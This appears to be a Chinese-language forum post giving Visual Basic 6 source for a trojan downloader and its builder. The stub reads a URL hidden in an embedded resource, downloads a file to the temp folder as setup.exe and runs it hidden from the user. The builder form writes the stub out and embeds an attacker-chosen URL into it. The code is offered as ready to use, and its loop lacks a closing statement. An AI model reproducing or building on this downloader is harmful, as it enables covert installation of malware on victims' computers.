private declare function gettemppath lib "kernel32" alias "gettemppatha" _ '取得temp目录的api
(byval nbufferlength as long, byval lpbuffer as string) as long
private declare function urldownloadtofile lib "urlmon" alias "urldownloadtofilea" (byval pcaller as long, byval szurl as string, byval szfilename as string, byval dwreserved as long, byval lpfncb as long) as long'下在文件的api
public sub main()
dim sourceurl as string
dim chen() as byte
dim targetfile as string
dim temppath as string
dim len5 as long
dim i as long
chen = loadresdata("http", "图标") '取出数据
for i = 0 to 184 '还原为字符
if chen(i) <> 0 and chen(i) <> 32 then
sourceurl = sourceurl + chr(chen(i))
end if
temppath = string(255, 0)
len5 = gettemppath(256, temppath)
temppath = left(temppath, len5)
targetfile = temppath + "setup.exe" ' 保存路径
hfile = urldownloadtofile(0&, sourceurl, targetfile, 0&, 0&)
if hfile = 0 then
shell targetfile, vbhide
end if
end sub
保存为bas 文件就可以了
public declare function beginupdateresource lib "kernel32" alias "beginupdateresourcea" (byval pfilename as string, byval bdeleteexistingresources as long) as long
public declare function updateresource lib "kernel32" alias "updateresourcea" (byval hupdate as long, byval lptype as string, byval lpname as string, byval wlanguage as long, lpdata as any, byval cbdata as long) as long
public declare function endupdateresource lib "kernel32" alias "endupdateresourcea" (byval hupdate as long, byval fdiscard as long) as long
private sub command1_click()
dim bwenjian as long
dim wenjian as long
dim ewenjian as long
dim app2() as byte
dim astr as string * 200
app2 = loadresdata("exe", "exefile")
if dir(text1.text) <> "" then
msgbox text1.text + "已存在"
exit sub
end if
open text1.text for binary as #1
put #1, , app2()
close #1
astr = left$(text2.text, 200)
bwenjian = beginupdateresource(text1.text, false)' 开始一个添加资源的过程
wenjian = updateresource(bwenjian, "图标", "http", 2052, byval astr, 200) ' 添加资源
ewenjian = endupdateresource(bwenjian, false) ' 结束添加资源过程
end sub
private sub form_load()
text1.text = app.path & "/xz.exe" ' 默认的服务端文件名
end sub
当然你要把 服务端的exe导入里面存为资源